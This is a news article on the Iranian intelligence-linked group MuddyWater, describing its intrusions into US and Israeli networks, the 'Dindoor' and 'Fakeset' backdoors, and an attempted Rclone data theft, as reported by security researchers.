Iranian Ministry of Intelligence-linked MuddyWater cyber crew embedded in US networks since February, deploying custom backdoors and exfiltrating data from critical infrastructure.
Iranian cyber operatives linked to Tehran's intelligence apparatus have infiltrated networks belonging to a US bank, airport, and software company, deploying custom malware and attempting data exfiltration in a campaign that began before recent military strikes in the region.
Iranian Intelligence Operation Targets Critical Infrastructure
The cyber crew, known as MuddyWater and believed to be part of Iran's Ministry of Intelligence and Security (MOIS), has maintained a presence on multiple US organizations' networks since early February, according to researchers from Symantec and Carbon Black's threat hunting team. The infiltration includes a major US bank, a software firm that supplies technology to defense and aerospace industries, and an airport, along with non-governmental organizations in both the United States and Canada.
The timing of these intrusions is particularly concerning, as the threat actors were already embedded in US and Israeli networks before the current hostilities began. This positions the group to potentially launch disruptive attacks on compromised systems at any moment, security analysts warn.
Custom Malware Arsenal Discovered
Researchers uncovered a previously unknown backdoor they've named "Dindoor" during their investigation. This malware uses Deno, a secure runtime for JavaScript and TypeScript, to execute its operations. The backdoor was signed with a certificate issued to "Amy Cherne" and was found on networks belonging to the Israeli software company, the US bank, and a Canadian nonprofit organization.
A separate Python-based backdoor called "Fakeset" was discovered on the airport and a US nonprofit's networks. This malware was signed by certificates issued to both "Amy Cherne" and "Donald Gay." The latter certificate has been previously used to sign Stagecomp and Darkcomp malware, both linked to MuddyWater operations, providing strong evidence of the group's involvement.
Data Exfiltration Attempts
Investigators found evidence that the compromised software company was targeted for data theft using Rclone to transfer files to a Wasabi cloud storage bucket. While it remains unclear whether this exfiltration was successful, the attempt indicates intelligence-gathering motives behind the intrusions.
The software company's connections to defense and aerospace industries, combined with its presence in Israel, suggest that Israeli operations may be the primary target of this campaign. The discovery of Dindoor specifically on the Israeli location's networks supports this assessment.
Persistent Threat Actor
MuddyWater, also known as Seedworm and Static Kitten, has been conducting cyber campaigns on behalf of Iranian intelligence since approximately 2018. The group typically gains initial access through phishing emails or by exploiting vulnerabilities in public-facing applications, though the specific entry point for this campaign remains unknown.
Iranian cyber operations span a range of motives, from intelligence gathering to potential disruption. While the current campaign appears focused on data collection, security analysts note that groups like MuddyWater could pivot to disruptive attacks on organizations they've already compromised, especially in response to escalating regional tensions.
Broader Regional Cyber Conflict
The discovery comes amid heightened cyber activity in the Middle East following military strikes. Check Point security researchers reported tracking "hundreds" of exploitation attempts targeting internet-connected surveillance cameras across Israel and other Middle Eastern countries since the conflict began on February 28.
In a related incident from May 2025, MuddyWater compromised a server containing live CCTV streams from Jerusalem, allowing the crew to surveil the city for potential targets. On June 23, the same day Iran bombed Jerusalem, Israeli authorities reported that Iranian forces were exploiting compromised security cameras to collect real-time intelligence and adjust missile targeting.
While analysts have observed an increase in spying expeditions, digital probes, and distributed denial-of-service attacks in recent weeks, no major disruptive cyberattacks have materialized thus far. However, the pre-positioned access that MuddyWater maintains on critical US and Israeli networks represents a significant threat that could materialize at any time.
The FBI, US Cybersecurity and Infrastructure Security Agency (CISA), and UK National Cyber Security Centre (NCSC) continue to track MuddyWater's activities, emphasizing the persistent nature of state-sponsored cyber threats in an increasingly volatile geopolitical landscape.
Comments
Please log in or register to join the discussion